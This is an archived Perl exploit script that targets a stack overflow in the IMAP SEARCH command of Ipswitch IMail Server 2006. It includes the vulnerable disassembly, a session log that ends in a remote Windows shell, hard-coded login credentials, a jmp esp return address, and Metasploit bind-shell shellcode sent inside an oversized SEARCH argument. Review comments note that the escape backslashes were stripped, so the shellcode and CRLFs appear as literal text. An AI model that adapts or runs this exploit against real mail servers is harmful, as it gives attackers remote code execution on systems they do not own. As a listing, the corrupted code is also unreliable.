
# Title : IPSwitch IMail Server 2006 SEARCH Remote Stack Overflow Exploit
# Published : 2007-07-25
# Author : ZhenHan.Liu


#!/use/bin/perl
#
# Ipswitch IMail Server 2006 IMAP SEARCH COMMAND Stack Overflow Exploit
# Author: ZhenHan.Liu#ph4nt0m.org
# Date: 2007-07-25
# Team: Ph4nt0m Security Team (http://www.ph4nt0m.org)
#
# Vuln Found by: Manuel Santamarina Suarez
# http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=563
#
# The Vuln code is here (imap4d32.exe version 6.8.8.1)
#  00418CCA  |.  8B8D 28EFFFFF |MOV ECX,DWORD PTR SS:[EBP-10D8]
#  00418CD0  |.  0FBE11        |MOVSX EDX,BYTE PTR DS:[ECX]
#  00418CD3  |.  83FA 22       |CMP EDX,22
#  00418CD6  |.  75 2A         |JNZ SHORT IMAP4D32.00418D02
#  00418CD8  |.  8B85 28EFFFFF |MOV EAX,DWORD PTR SS:[EBP-10D8]
#  00418CDE  |.  50            |PUSH EAX                                ; /String
#  00418CDF  |.  FF15 84004300 |CALL DWORD PTR DS:[<&KERNEL32.lstrlenA>>; lstrlenA
#  00418CE5  |.  83E8 02       |SUB EAX,2
#  00418CE8  |.  50            |PUSH EAX                                ; /maxlen
#  00418CE9  |.  8B8D 28EFFFFF |MOV ECX,DWORD PTR SS:[EBP-10D8]         ; |
#  00418CEF  |.  83C1 01       |ADD ECX,1                               ; |
#  00418CF2  |.  51            |PUSH ECX                                ; |src
#  00418CF3  |.  8D55 AC       |LEA EDX,DWORD PTR SS:[EBP-54]           ; |
#  00418CF6  |.  52            |PUSH EDX                                ; |dest
#  00418CF7  |.  FF15 00024300 |CALL DWORD PTR DS:[<&MSVCR71.strncpy>]  ; strncpy
#  00418CFD  |.  83C4 0C       |ADD ESP,0C
#  00418D00  |.  EB 13         |JMP SHORT IMAP4D32.00418D15
#  00418D02  |>  8B85 28EFFFFF |MOV EAX,DWORD PTR SS:[EBP-10D8]
#  00418D08  |.  50            |PUSH EAX                                ; /src
#  00418D09  |.  8D4D AC       |LEA ECX,DWORD PTR SS:[EBP-54]           ; |
#  00418D0C  |.  51            |PUSH ECX                                ; |dest
#  00418D0D  |.  E8 7E610100   |CALL <JMP.&MSVCR71.strcpy>              ; strcpy
#  00418D12  |.  83C4 08       |ADD ESP,8
#  
#  The programmer has made an extremely stupid mistake.
#  He checks the arg's first byte: if it is 0x22 ( " ), then strcpy is invoked,
#  else strncpy.
#  The buffer overflow takes place when strcpy is called.
#  But the strncpy path is also vulnerable, because it amounts to this: strncpy(dest, src, strlen(src));
#  So, whether the command starts with a '"' or not, the stack overflow takes place immediately.
# 
#  Multiple SEARCH commands are vulnerable; in this case we use "SEARCH ON",
#  but others such as "SEARCH BEFORE" will also trigger the overflow.
#
#  NOTES: To trigger the Vuln, there must be at least one mail in the mailbox!!
#
#  Badchar is: 0x00 0x0a 0x0d 0x0b 0x09 0x0c 0x20
#
# Tested On Windows 2003 SP1 CN
#
#  D:\>perl imap.pl 192.168.226.128 143
#  * OK IMAP4 Server (IMail 9.10)
#  0 OK LOGIN completed
#  * FLAGS (Answered Flagged Deleted Seen Draft)
#  * 1 EXISTS
#  * 1 RECENT
#  * OK [UIDVALIDITY 1185337300] UIDs valid
#  * OK [UIDNEXT 485337302] Predicted next UID
#  2 OK [READ-WRITE] SELECT completed
#  -------------- [BEGIN] -------------------
#  ----------------  [END]  ------------------
#  
#
#  D:\>nc -vv -n 192.168.226.128 1154
#  (UNKNOWN) [192.168.226.128] 1154 (?) open
#  Microsoft Windows [版本 5.2.3790]
#  (C) 版权所有 1985-2003 Microsoft Corp.
#  
#  C:\WINDOWS\system32>
#
#


use strict;
use warnings;
use IO::Socket;

# Target host and port are taken positionally from @ARGV (file-scope shift).
# Neither is validated: a missing argument leaves the variable undef and the
# connect below simply fails.
my $host = shift ;
my $port = shift ;
# Hard-coded IMAP credentials for the test mailbox. Per the header, the
# mailbox must already contain at least one message for the code path to be
# reached.
my $account = "void";
my $password = "ph4nt0m.org";

# Filler that precedes the overwritten return address inside the SEARCH
# argument. `x 4` binds tighter than `.`, so $pad1 is the 20-character string
# repeated four times followed by "ph4nt0m" (87 characters). The "[at]" looks
# like an archive-side rewrite of "@" -- TODO confirm against the original post.
my $pad1 = "void[at]ph4nt0m.org_" x 4 . "ph4nt0m";
my $pad2 = 'void[at]pstgroup';
# Described by the author as a universal `jmp esp` address for the listed
# Windows versions. NOTE(review): as archived, the "\" of every \xNN escape has
# been dropped, so this literal (and $shellcode below) is plain ASCII hex text
# rather than the bytes the comments describe; the listing is a transcript of
# the original, not a runnable artefact.
my $jmpesp = "x12x45xfax7f"; # Windows 2000/xp/2003 Universal

# Metasploit-generated win32_bind payload; per the generator line it listens on
# TCP 1154, which matches the nc session shown in the header. Same
# escape-stripping caveat as $jmpesp.
# win32_bind -  EXITFUNC=thread LPORT=1154 Size=344 Encoder=Pex http://metasploit.com
my $shellcode =
"x29xc9x83xe9xb0xe8xffxffxffxffxc0x5ex81x76x0exb6".
"x78xf8x75x83xeexfcxe2xf4x4ax12x13x38x5ex81x07x8a".
"x49x18x73x19x92x5cx73x30x8axf3x84x70xcex79x17xfe".
"xf9x60x73x2ax96x79x13x3cx3dx4cx73x74x58x49x38xec".
"x1axfcx38x01xb1xb9x32x78xb7xbax13x81x8dx2cxdcx5d".
"xc3x9dx73x2ax92x79x13x13x3dx74xb3xfexe9x64xf9x9e".
"xb5x54x73xfcxdax5cxe4x14x75x49x23x11x3dx3bxc8xfe".
"xf6x74x73x05xaaxd5x73x35xbex26x90xfbxf8x76x14x25".
"x49xaex9ex26xd0x10xcbx47xdex0fx8bx47xe9x2cx07xa5".
"xdexb3x15x89x8dx28x07xa3xe9xf1x1dx13x37x95xf0x77".
"xe3x12xfax8ax66x10x21x7cx43xd5xafx8ax60x2bxabx26".
"xe5x2bxbbx26xf5x2bx07xa5xd0x10xfcxf7xd0x2bx71x94".
"x23x10x5cx6fxc6xbfxafx8ax60x12xe8x24xe3x87x28x1d".
"x12xd5xd6x9cxe1x87x2ex26xe3x87x28x1dx53x31x7ex3c".
"xe1x87x2ex25xe2x2cxadx8ax66xebx90x92xcfxbex81x22".
"x49xaexadx8ax66x1ex92x11xd0x10x9bx18x3fx9dx92x25".
"xefx51x34xfcx51x12xbcxfcx54x49x38x86x1cx86xbax58".
"x48x3axd4xe6x3bx02xc0xdex1dxd3x90x07x48xcbxeex8a".
"xc3x3cx07xa3xedx2fxaax24xe7x29x92x74xe7x29xadx24".
"x49xa8x90xd8x6fx7dx36x26x49xaex92x8ax49x4fx07xa5".
"x3dx2fx04xf6x72x1cx07xa3xe4x87x28x1dx59xb6x18x15".
"xe5x87x2ex8ax66x78xf8x75";


# Open the TCP connection. `||` applies to the whole parenthesised new() call,
# so die is reached on failure (the "\n" in the message has lost its backslash
# too). NOTE(review): IO::Socket::INET documents the key as `Proto`; the
# lowercase `proto` is presumably ignored, and tcp is the default anyway.
my $sock = IO::Socket::INET->new( PeerHost=>$host, PeerPort=>$port, proto=>"tcp" ) || die "Connect error.n";

# Server greeting: echo it and bail out unless it contains "OK".
# exit(-1) reaches the shell as status 255 on most platforms.
my $res = <$sock>;
print $res;
if( $res !~ /OK/ )
{
	exit(-1);
}

# Plaintext LOGIN with tag 0; the hard-coded credentials go over the wire in
# the clear. "rn" is the IMAP CRLF terminator with its backslashes lost, so as
# listed the command line is never terminated and the read below would
# presumably block rather than return a tagged reply.
print $sock "0 LOGIN $account $passwordrn";
print $res = <$sock>;   # assign the reply, then print it
if( $res !~ /0 OK/ )
{
	exit(-1);
}

# SELECT INBOX with tag 1. Untagged "* ..." responses are echoed until the
# tagged reply arrives: "1 OK" proceeds, "1 NO" or any line containing "BAD"
# aborts. The loop has no timeout, so a server that stops answering hangs it.
print $sock "1 SELECT INBOXrn";
while(1)
{
	print $res = <$sock>;
	if($res =~ /1 OK/)
	{	last; }
	elsif($res =~ /1 NO/ || $res =~ /BAD/)
	{ 	exit(-1); }
	else
	{	next; }
}

# Assemble the oversized SEARCH argument (filler, address, filler, payload) and
# send it as "SEARCH ON <...>" with tag 2. The header attributes the overflow to
# an unbounded strcpy/strncpy of this argument in imap4d32.exe; for a defender,
# a single SEARCH line of this length is the observable artefact on the wire.
# No reply is read, so this script reports nothing about success or failure.
my $payload = $pad1.$jmpesp.$pad2.$shellcode;
print $sock "2 SEARCH ON <$payload>rn";

$sock->close();
